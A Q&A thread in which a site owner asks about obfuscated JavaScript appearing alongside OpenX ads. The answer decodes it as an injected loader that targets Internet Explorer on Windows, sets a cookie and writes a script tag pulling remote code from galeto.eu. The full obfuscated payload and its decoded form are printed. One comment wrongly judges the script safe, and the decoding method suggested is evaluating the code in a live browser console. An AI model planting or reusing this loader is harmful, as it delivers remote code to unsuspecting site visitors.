# OpenX displaying strange javascript code

Tags: javascript, jquery, openx

I am running OpenX Ad server on my site and lately I have been noticing strange code being displayed with the ads. I am not sure if that is part of the OpenX code or if the application has been compromised somehow. Perhaps someone with a javascript knowledge can explain this for me. This is the code:

```
<script>try{_=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";"+_._+_.$_$_+"=\\"+_.__$+_.$_$+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$_$_+_.__+_._$+"\\"+_.__$+_.$$_+_._$_+"."+_._+"\\"+_.__$+_.$$_+_._$$+_.$$$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.___+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";\\"+_.__$+_.$_$+_.__$+_.$$$$+"("+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"==="+_._+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_.$$$_+_.$$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+_.$$_$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('_"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"=')==-"+_.__$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_._$_+_.$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_._$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_.$$_+"\\"+_.__$+_._$_+_.$__+"\\"+_.$__+_.___+"')>"+_.___+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_.__$+_.$_$+"\\"+_.__$+_._$_+_._$$+"\\"+_.__$+_.__$+_.__$+"\\"+_.__$+_.___+_.$_$+"\\"+_.$__+_.___+"')>"+_.___+")\\"+_.$__+_.___+"{"+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"="+_.__$+";"+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+"='__"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"="+_.__$+";\\"+_.$__+_.___+_.$$$_+"\\"+_.__$+_.$$$+_.___+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_._$_+_.$$$_+"\\"+_.__$+_.$$_+_._$$+"=\\"+_.__$+_._$_+_.$$$+_.$$$_+_.$$_$+",\\"+_.$__+_.___+_.___+_.__$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_._$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+"\\"+_.$__+_.___+_._$_+_.___+_._$_+_.___+"\\"+_.$__+_.___+_.___+_.___+":"+_.___+_.___+":"+_.___+_.___+"\\"+_.$__+_.___+"\\"+_.__$+_._$_+_.$_$+"\\"+_.__$+_._$_+_.$__+"\\"+_.__$+_.___+_._$$+";\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_.___+_.$_$_+_.__+"\\"+_.__$+_.$_$+_.___+"=/';"+_.$$_$+".\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+_.__+_.$$$_+(![]+"")[_._$_]+"\\"+_.__$+_.$_$+_.$$_+"(\\\"<\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\\"+\\\"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"='\\"+_.__$+_.$_$+_.___+_.__+_.__+"\\"+_.__$+_.$$_+_.___+"://\\"+_.__$+_.$__+_.$$$+_.$_$_+(![]+"")[_._$_]+_.$$$_+_.__+_._$+"."+_.$$$_+_._+"/"+_.$_$+_.$$_$+_.$$_+_._$_+_.___+_.$$_+_.$$_$+_.$$_$+".\\"+_.__$+_.$_$+_._$_+"\\"+_.__$+_.$$_+_._$$+"?"+_.$$__+"\\"+_.__$+_.$$_+_.___+"=\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"."+_.$_$$+"\\"+_.__$+_.$$_+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"."+_.$$__+_._$+"\\"+_.__$+_.$_$+_.$_$+"'></\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\\"+\\\"\\"+_.__$+_.$$_+_.___+_.__+">\\\");}"+"\"")())();}catch(e){}</script>
```

Answer (score 2, accepted):

When evaluated the obfuscated code will define this function and executes it:

```
function anonymous() {
    d=document;ua=navigator.userAgent;
    if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {
        d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
        d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>");
    }
}
```

Basically, it set a cookie and loads an additional JavaScript file.

Comment: Can you please show how do you safely evaluated the code? thanks +1

Comment: Well, setting the cookie doesn't seem to be harmful. The injected script may be, but galeto.eu is not a registered domain. So as it stands the obfuscated script is not harmful, and its execution is save.

Comment: I mean, how did you converted obfuscated to clear code?  did you eval(ed) it? did you alert(ed) it? are this two safe? did you used other method?

Comment: galeto.eu is alive on 103.31.186.95

Comment: I evaluated the ... in '<script>try{...();}catch(e){}</script>' in the JavaScript console of my browser.

Comment: What? wow. How in the world does that convert into your clear code. That is amazing